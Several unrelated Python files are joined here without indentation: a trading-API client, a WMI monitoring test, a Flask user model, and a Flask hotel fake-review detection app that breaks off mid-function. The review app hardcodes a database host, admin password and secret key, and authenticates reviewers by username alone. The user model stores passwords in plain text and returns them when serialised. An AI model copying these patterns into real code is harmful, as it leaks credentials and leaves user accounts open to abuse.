orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_CLOSEYESTERDAY
orderReq.direction = DIRECTION_LONG
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def cancelOrder(self, rtOrderID):
try:
response = requests.post(basetPath + '/core/cancelOrder', json={
'rtOrderID': rtOrderID
})
responseJson = json.loads(response.content)
if 200 <= response.status_code < 300 and responseJson['status'] == 'success':
return responseJson['data']
else:
log.error(response)
return None
except Exception, e:
log.error(e)
return None
def subscribe(self, subscribeReq):
self.tickIDSet.add(subscribeReq.symbol + "." + subscribeReq.exchange + "." + subscribeReq.gatewayID)
try:
postData = {'token': token}
postData.update(subscribeReq.__dict__)
# headers = {'content-type': 'application/json'}
response = requests.post(basetPath + '/core/subscribe', json=postData)
responseJson = json.loads(response.content)
if 200 <= response.status_code < 300 and responseJson['status'] == 'success':
return responseJson['data']
else:
log.error(response)
return None
except Exception, e:
log.error(e)
return None
def getContracts(self):
return self.getData("/core/contracts")
def getTicks(self):
return self.getData("/core/ticks")
def getTrades(self):
return self.getData("/core/trades")
def getOrders(self):
return self.getData("/core/orders")
def getAccounts(self):
return self.getData("/core/accounts")
def getPositions(self):
return self.getData("/core/positions")
def getGateways(self):
return self.getData("/core/gateways")
def onEventTick(self, tick):
if debug:
log.info(tick)
def onEventTicksChanged(self, *args):
if debug:
log.info(args)
def onEventTicks(self, *args):
if debug:
log.info(self, args)
def onEventTrade(self, trade):
if debug:
log.info(trade)
def onEventTrades(self, trades):
if debug:
log.info(trades)
def onEventOrder(self, order):
if debug:
log.info(order)
def onEventOrders(self, orders):
if debug:
log.info(orders)
def onEventPosition(self, position):
if debug:
log.info(position)
def onEventPositions(self, positions):
if debug:
log.info(positions)
def onEventAccount(self, account):
if debug:
log.info(account)
def onEventAccounts(self, accounts):
if debug:
log.info(accounts)
def onEventContract(self, contract):
if debug:
log.info(contract)
def onEventContracts(self, contracts):
if debug:
log.info(contracts)
def onEventError(self, error):
if debug:
log.info(error)
def onEventErrors(self, errors):
if debug:
log.info(self, errors)
def onEventGateway(self, *args):
if debug:
log.info(args)
def onEventGateways(self, *args):
if debug:
log.info(args)
def onEventLog(self, log):
if debug:
log.info(log)
def onEventLogs(self, logs):
if debug:
log.info(self, logs)
def onEventThreadStop(*args):
if debug:
log.info(args)
def start(self):
io = SocketIO('http://'+host, port=socketIOPort, params={'token': token}) # create connection with params
io.on(EVENT_TICK, self.onEventTick)
io.on(EVENT_TICKS_CHANGED, self.onEventTicksChanged)
io.on(EVENT_TICKS, self.onEventTicks)
io.on(EVENT_TRADE, self.onEventTrade)
io.on(EVENT_TRADES, self.onEventTrades)
io.on(EVENT_ORDER, self.onEventOrder)
io.on(EVENT_ORDERS, self.onEventOrders)
io.on(EVENT_POSITION, self.onEventPosition)
io.on(EVENT_POSITIONS, self.onEventPositions)
io.on(EVENT_ACCOUNT, self.onEventAccount)
io.on(EVENT_ACCOUNTS, self.onEventAccounts)
io.on(EVENT_CONTRACT, self.onEventContract)
io.on(EVENT_CONTRACTS, self.onEventContracts)
io.on(EVENT_ERROR, self.onEventError)
io.on(EVENT_ERRORS, self.onEventErrors)
io.on(EVENT_GATEWAY, self.onEventGateway)
io.on(EVENT_GATEWAYS, self.onEventGateways)
io.on(EVENT_LOG, self.onEventLog)
io.on(EVENT_LOGS, self.onEventLogs)
io.on(EVENT_THREAD_STOP, self.onEventThreadStop)
io.wait()
|
# stdlib
import copy
# 3p
from mock import Mock
from nose.plugins.attrib import attr
# project
from tests.checks.common import AgentCheckTest
INSTANCE = {
'class': 'Win32_PerfFormattedData_PerfProc_Process',
'metrics': [
['ThreadCount', 'proc.threads.count', 'gauge'],
['IOReadBytesPerSec', 'proc.io.bytes_read', 'gauge'],
['VirtualBytes', 'proc.mem.virtual', 'gauge'],
['PercentProcessorTime', 'proc.cpu_pct', 'gauge'],
],
'tag_by': 'Name',
}
INSTANCE_METRICS = [
'proc.threads.count',
'proc.io.bytes_read',
'proc.mem.virtual',
'proc.cpu_pct',
]
@attr('windows')
@attr(requires='windows')
class WMICheckTest(AgentCheckTest):
CHECK_NAME = 'wmi_check'
def test_basic_check(self):
instance = copy.deepcopy(INSTANCE)
instance['filters'] = [{'Name': 'svchost'}]
self.run_check({'instances': [instance]})
for metric in INSTANCE_METRICS:
self.assertMetric(metric, tags=['name:svchost'], count=1)
self.coverage_report()
def test_check_with_wildcard(self):
instance = copy.deepcopy(INSTANCE)
instance['filters'] = [{'Name': 'svchost%'}]
self.run_check({'instances': [instance]})
for metric in INSTANCE_METRICS:
# We can assume that at least 2 svchost processes are running
self.assertMetric(metric, tags=['name:svchost'], count=1)
self.assertMetric(metric, tags=['name:svchost#1'], count=1)
def test_check_with_tag_queries(self):
instance = copy.deepcopy(INSTANCE)
instance['filters'] = [{'Name': 'svchost%'}]
# `CreationDate` is a good property to test the tag queries but would obviously not be useful as a tag in DD
instance['tag_queries'] = [['IDProcess', 'Win32_Process', 'Handle', 'CreationDate']]
self.run_check({'instances': [instance]})
for metric in INSTANCE_METRICS:
# No instance "number" (`#`) when tag_queries is specified
self.assertMetricTag(metric, tag='name:svchost#1', count=0)
self.assertMetricTag(metric, tag='name:svchost')
self.assertMetricTagPrefix(metric, tag_prefix='creationdate:')
def test_invalid_class(self):
instance = copy.deepcopy(INSTANCE)
instance['class'] = 'Unix'
logger = Mock()
self.run_check({'instances': [instance]}, mocks={'log': logger})
# A warning is logged
self.assertEquals(logger.warning.call_count, 1)
# No metrics/service check
self.coverage_report()
def test_invalid_metrics(self):
instance = copy.deepcopy(INSTANCE)
instance['metrics'].append(['InvalidProperty', 'proc.will.not.be.reported', 'gauge'])
logger = Mock()
self.run_check({'instances': [instance]}, mocks={'log': logger})
# A warning is logged
self.assertEquals(logger.warning.call_count, 1)
# No metrics/service check
self.coverage_report()
|
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, nullable=False)
email = db.Column(db.String, nullable=False)
password = db.Column(db.String, nullable=False)
def __init__(self, **kwargs):
self.name = kwargs.get('name', '')
self.email = kwargs.get('email', '')
self.password = kwargs.get('password', '')
def serialize(self):
return {
'id': self.id,
'name': self.name,
'email': self.email,
'password': self.password
} |
# importing flask modules
from flask import Flask, render_template, request, redirect, url_for, session, flash
from flask_mysqldb import MySQL
import MySQLdb.cursors
import re
import csv
import mlmodel
import Fake_review_5_Algos
import pandas as pd
import io
import random
from flask import Response
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from flask import flash
from flask import request
from flask import jsonify
from datetime import date, datetime
import hashlib
import os
# ************************************************************************************************
pw = '52Pr@n@li'
# initializing a variable of Flask
app = Flask(__name__)
# app = Flask(__name__, static_url_path='/static')
app.secret_key = 'frd'
app.config['MYSQL_HOST'] = 'svc-5f63a094-b9ed-4c30-9f33-37e0a5e348f3-ddl.azr-virginia-2.svc.singlestore.com'
app.config['MYSQL_USER'] = 'admin'
app.config['MYSQL_PASSWORD'] = pw
app.config['MYSQL_DB'] = 'beproject'
mysql = MySQL(app)
app_dir = os.path.dirname(os.path.abspath(__file__))
app.config['UPLOAD_FOLDER'] = os.path.join(app_dir, 'static')
# decorating index function with the app.route with url as /login
@app.route('/')
def home():
return render_template('HomePage.html')
@app.route('/dashboard.html', methods=["GET", "POST"])
def dashboard():
conn = MySQLdb.connect("svc-5f63a094-b9ed-4c30-9f33-37e0a5e348f3-ddl.azr-virginia-2.svc.singlestore.com", "admin", pw, "beproject")
cur = conn.cursor()
cur.execute('select username,email from user_registered')
data = cur.fetchall() # data from user_registered database
cur.execute('select * from book_room')
data1 = cur.fetchall() # data from book_room database
cur.execute('select * from book_table')
data2 = cur.fetchall() # data from book_table database
df1 = pd.read_csv('out.csv')
header1 = ["ReviewID", "Reviews", 'Hotel', "City", "UserName", "Polarity"]
df1.columns = header1
a = df1.groupby(["City", "Hotel", "Polarity"], as_index=False)["Reviews"].count()
City = list(a['City'])
Hotel = list(a['Hotel'])
Polarity = list(a['Polarity'])
ReviewsCNT = list(a['Reviews'])
# for deceptive reviews
df = pd.read_csv(r'fake_review_out.csv')
header = ["ReviewID", "Reviews", 'Hotel', "City", "UserName", "NB", "SVC", "SGD", "LR", "DT", "Output"]
df.columns = header
FCity = list(df['City'])
FHotel = list(df['Hotel'])
FinalOutput = list(df['Output'])
Reviews = list(df['Reviews'])
DBuser = list(df['UserName'])
ReviewID= list(df['ReviewID'])
puneReviews = list()
puneHotels = list()
MumbaiReviews = list()
MumbaiHotels = list()
BangloreReviews = list()
BangloreHotels = list()
KolkataReviews = list()
KolkataHotels = list()
Puneuser = list()
Mumbaiuser = list()
Kolkatauser = list()
Bangloreuser = list()
puneID = list()
mumbaiID= list()
kolkataID= list()
bangaloreID= list()
# print(City)
for j in range(1, len(df)):
if FCity[j] == "Pune":
if FinalOutput[j] == 0:
puneReviews.append(Reviews[j])
puneHotels.append(FHotel[j])
Puneuser.append(DBuser[j])
puneID.append(ReviewID[j])
# print("pune ",Reviews[j])
# print("pune ",FinalOutput[j],'j=',j)
for j in range(1, len(df)):
if FCity[j] == "Mumbai":
if FinalOutput[j] == 0:
MumbaiReviews.append(Reviews[j])
MumbaiHotels.append(FHotel[j])
Mumbaiuser.append(DBuser[j])
mumbaiID.append(ReviewID[j])
# print("mumbai ",Reviews[j])
for j in range(1, len(df)):
if FCity[j] == "Bangalore":
if FinalOutput[j] == 0:
BangloreReviews.append(Reviews[j])
BangloreHotels.append(FHotel[j])
Bangloreuser.append(DBuser[j])
bangaloreID.append(ReviewID[j])
# print("Banglore ",Reviews[j])
for j in range(1, len(df)):
if FCity[j] == "Kolkata":
if FinalOutput[j] == 0:
KolkataReviews.append(Reviews[j])
KolkataHotels.append(FHotel[j])
Kolkatauser.append(DBuser[j])
kolkataID.append(ReviewID[j])
# print("Kolkata",Reviews[j])
Cities = set(City)
l1 = list()
l11 = list()
h1 = list()
h11 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Pune":
if Polarity[j] == 0:
l1.append(ReviewsCNT[j])
l11.append(Hotel[j])
elif Polarity[j] == 1:
h1.append(ReviewsCNT[j])
h11.append(Hotel[j])
l2 = list()
l12 = list()
h2 = list()
h12 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Mumbai":
if Polarity[j] == 0:
l2.append(ReviewsCNT[j])
l12.append(Hotel[j])
elif Polarity[j] == 1:
h2.append(ReviewsCNT[j])
h12.append(Hotel[j])
l3 = list()
l13 = list()
h3 = list()
h13 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Kolkata":
if Polarity[j] == 0:
l3.append(ReviewsCNT[j])
l13.append(Hotel[j])
elif Polarity[j] == 1:
h3.append(ReviewsCNT[j])
h13.append(Hotel[j])
l4 = list()
l14 = list()
h4 = list()
h14 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Bangalore":
if Polarity[j] == 0:
l4.append(ReviewsCNT[j])
l14.append(Hotel[j])
elif Polarity[j] == 1:
h4.append(ReviewsCNT[j])
h14.append(Hotel[j])
PN_Pune_Df = pd.DataFrame({'Hotels': l11, 'Positive Review Count': h1, 'Negative Review Count': l1}).set_index(
'Hotels')
PN_Mumbai_Df = pd.DataFrame({'Hotels': l12, 'Positive Review Count': h2, 'Negative Review Count': l2}).set_index(
'Hotels')
PN_Kolkata_Df = pd.DataFrame({'Hotels': l13, 'Positive Review Count': h3, 'Negative Review Count': l3}).set_index(
'Hotels')
PN_Bangalore_Df = pd.DataFrame({'Hotels': l14, 'Positive Review Count': h4, 'Negative Review Count': l4}).set_index(
'Hotels')
'''
Pune_Df = pd.DataFrame({'User':Puneuser,'Hotels': puneHotels, 'Deceptive Reviews': puneReviews})
Mumbai_Df = pd.DataFrame({'User':Mumbaiuser,'Hotels': MumbaiHotels, 'Deceptive Reviews': MumbaiReviews})
Kolkata_Df = pd.DataFrame({'User':Kolkatauser,'Hotels': KolkataHotels, 'Deceptive Reviews': KolkataReviews})
Bangalore_Df = pd.DataFrame({ 'User':Bangloreuser,'Hotels': BangloreHotels,'Deceptive Reviews': BangloreReviews})
'''
puneImage= os.path.join(app.config['UPLOAD_FOLDER'],'Punegraph.jpg')
MumbaiImage= os.path.join(app.config['UPLOAD_FOLDER'],'Mumbai.jpg')
KolkataImage= os.path.join(app.config['UPLOAD_FOLDER'],'Kolkata.jpg')
BangloreImage= os.path.join(app.config['UPLOAD_FOLDER'],'Bangalore.jpg')
cur.execute(
'SELECT ip_address, GROUP_CONCAT(DISTINCT user) FROM review GROUP BY ip_address HAVING COUNT(DISTINCT user) > 2 ORDER BY COUNT(DISTINCT user) DESC;')
ip = cur.fetchall()
cur.execute('SELECT *FROM suspicious_reviews;')
datemodule = cur.fetchall()
return render_template("dashboard.html", value=data, value1=data1, value2=data2, value3=PN_Pune_Df,
value4=PN_Mumbai_Df, value5=PN_Kolkata_Df, value6=PN_Bangalore_Df, value7=ip,
value8=datemodule, value9=Puneuser, value10=puneHotels, value11=puneReviews,
value12=Mumbaiuser, value13=MumbaiHotels, value14=MumbaiReviews, value15=Kolkatauser,
value16=KolkataHotels, value17=KolkataReviews, value18=Bangloreuser, value19=BangloreHotels,
value20=BangloreReviews, value21=len(Puneuser), value22=len(Mumbaiuser),
value23=len(Kolkatauser), value24=len(Bangloreuser),value25=puneID,value26=mumbaiID,value27=kolkataID,value28=bangaloreID,pune_image=puneImage,mumbai_image=MumbaiImage,kolkata_image=KolkataImage,bangalore_image=BangloreImage)
# **************************************************** PUNE ************************************************8
@app.route("/submitOrchidP", methods=["GET", "POST"])
def submitOrchidP():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Pune'
hotel = 'Orchid'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like %s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1=int(max1['max(review_id)'])+1
max1=str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1,name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
hotelsInPune()
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,%s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
print("In Orchid Table")
print(da)
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
else:
return render_template('alertpune.html')
return render_template('hotelsInPune.html')
@app.route("/submitNovotelP", methods=["GET", "POST"])
def submitNovotelP():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Pune'
hotel = 'Novotel'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInPune.html')
else:
return render_template('alertpune.html')
return render_template('hotelsInPune.html')
@app.route("/submitConradP", methods=["GET", "POST"])
def submitConradP():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Pune'
hotel = 'Conrad'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInPune.html')
else:
return render_template('alertpune.html')
return render_template('hotelsInPune.html')
@app.route("/submitCourtyardP", methods=["GET", "POST"])
def submitCourtyardP():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Pune'
hotel = 'Courtyard'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInPune.html')
else:
return render_template('alertpune.html')
return render_template('hotelsInPune.html')
# ***************************************** MUMBAI **********************************************
@app.route("/submitHiltonM", methods=["GET", "POST"])
def submitHiltonM():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Mumbai'
hotel = 'Hilton'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInMumbai.html')
else:
return render_template('alertmumbai.html')
return render_template('hotelsInMumbai.html')
@app.route("/submitTajM", methods=["GET", "POST"])
def submitTajM():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Mumbai'
hotel = 'Taj'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
